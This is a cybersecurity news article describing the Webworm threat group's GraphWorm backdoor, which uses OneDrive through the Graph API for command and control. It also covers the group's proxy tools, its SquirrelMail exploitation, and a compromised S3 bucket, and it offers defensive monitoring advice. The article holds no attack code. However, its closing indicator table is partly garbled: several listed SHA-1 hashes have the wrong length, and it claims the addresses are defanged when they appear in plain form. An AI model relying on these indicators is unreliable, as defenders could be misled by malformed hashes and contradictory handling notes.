A well-known China-aligned threat group has quietly evolved its attack methods, and its latest toolset reveals just how far it is willing to go to stay hidden.
A backdoor called GraphWorm has surfaced as part of this group’s growing arsenal, and what makes it stand out is the way it uses Microsoft OneDrive as its command-and-control channel.
Instead of communicating with suspicious servers, it hides its activity inside one of the world’s most trusted cloud platforms.
The threat group behind GraphWorm is tracked as Webworm, a China-aligned operation that has been active since at least 2017 and has steadily expanded its reach.
Initially focused on organizations across Asia, the group has since shifted its attention toward European targets, including government bodies in Belgium, Italy, Serbia, and Poland.
It has also targeted a university in South Africa, showing that its scope continues to widen.
WeLiveSecurity said in a report shared with Cyber Security News said that they identified the malware and published their findings on the group’s updated techniques.
.webp)
They noted that Webworm had previously relied on well-known backdoors like McRat and Trochilus, but has now moved away from those tools in favor of stealthier, custom-built options.
GraphWorm is one of two new backdoors added to the group’s toolkit, alongside a Discord-based backdoor called Choreerp.
GraphWorm, also referred to internally as OverOneDrive, is written in Go and uses Microsoft’s Graph API to communicate exclusively through OneDrive.
This approach makes its traffic look like ordinary cloud activity, which helps it slip past many security tools. A separate folder is created in OneDrive for each victim, and three subfolders handle different tasks: storing files, receiving job instructions, and sending back results from commands run on the infected machine.
.webp)
The group’s initial access techniques also offer a window into how victims first get compromised.
Webworm operators were found using open-source tools like Nuclei, a vulnerability scanner, and dirsearch, a web path scanner, against targets in Spain, Hungary, Belgium, Nigeria, Czechia, and Serbia.
A script exploiting a known post-authentication remote code execution flaw in SquirrelMail was also found in use, suggesting the group is actively hunting for exposed web applications as entry points.
GraphWorm sets itself apart by routing all communications through a legitimate Microsoft OneDrive instance rather than a dedicated server.
Upon first execution, the backdoor generates a unique victim identifier by combining network adapter details, processor information, and a device serial number.
It then creates or renames a OneDrive folder using this ID, ensuring each compromised machine has its own isolated workspace in the cloud.
Commands supported by the backdoor include uploading and downloading files, executing shell commands through cmd.exe, and adjusting sleep intervals.
Results from executed commands are written to a file named beaconshelloutput.txt and then uploaded back to OneDrive using Microsoft’s createUploadSession API endpoint.
Since the backdoor works entirely within a cloud environment, it can handle large file uploads without raising typical red flags.
Beyond the two new backdoors, Webworm has built an extensive proxy network using a combination of open-source and custom tools.
These include Wormsrp, a custom fork of the fast reverse proxy tool frp; ChainWorm, which chains multiple proxy hops together; SmuxProxy, based on the port-forwarding tool iox; and WormSocket, which routes traffic through websocket connections.
Each of these tools adds another layer between the attacker and their victim, making it harder to trace activity back to its source.
The group also used a compromised Amazon S3 bucket at wamanharipethe.s3.ap-south-1.amazonaws.com to store and retrieve configuration files for some of these proxy tools.
Files found in the bucket included virtual machine snapshots containing configuration data from a government entity in Italy and documents exfiltrated from a government body in Spain.
Security teams are advised to monitor for unusual outbound connections to cloud storage services, audit scheduled tasks and registry run keys for unauthorized entries, and watch for processes using cmd.exe or powershell.exe to download files from external sources.
Indicators of Compromise (IoCs):-
| Type | Indicator | Description |
|---|---|---|
| SHA-1 Hash | 50433336707381429707F59C3CBE8D497D98 |
SearchApp.exe — Win/Agent.KBuf |
| SHA-1 Hash | 1DF40A4A31B30B62EC33DC6FECC2C4408302ADC7 |
ssh.exe — Win/Hack Tool/Proxy.WQ |
| SHA-1 Hash | 7DCFE9EE25841DFD58D3D6871BF867FE32141DFB |
svc.exe — MSIL/Hack Tool/Proxy.WQ |
| SHA-1 Hash | 7F1970D620216C5FFF4E14A6CCC13FCCC267217C2 |
OverOneDrivev0316.exe — Win/Agent.78CV.M |
| SHA-1 Hash | 48159A7FC2E688386864BEA59FD40DFFC4B24D6 |
MessengerClient.exe — MSIL/Hack Tool/Proxy.WQ |
| SHA-1 Hash | A3C077BDF8898E612CCD65BC82E7960834ADB2A9 |
dsocks.exe — Win/RiskWare/iox |
| Domain/URL | wamanharipethe.s3.ap-south-1.amazonaws.com |
Compromised S3 bucket used for config and data exfiltration |
| IP Address | 45.77.13.67 |
Vultr Holdings — Wormsrp web server |
| IP Address | 64.176.85.158 |
The Constant Company — Wormsrp web server |
| IP Address | 104.243.23.43 |
Networksoc — SmuxProxy server |
| IP Address | 108.61.200.151 |
Vultr Holdings — Wormsrp proxy |
| IP Address | 144.168.60.233 |
Networksoc — Reverse proxy/Edison service |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Powered by
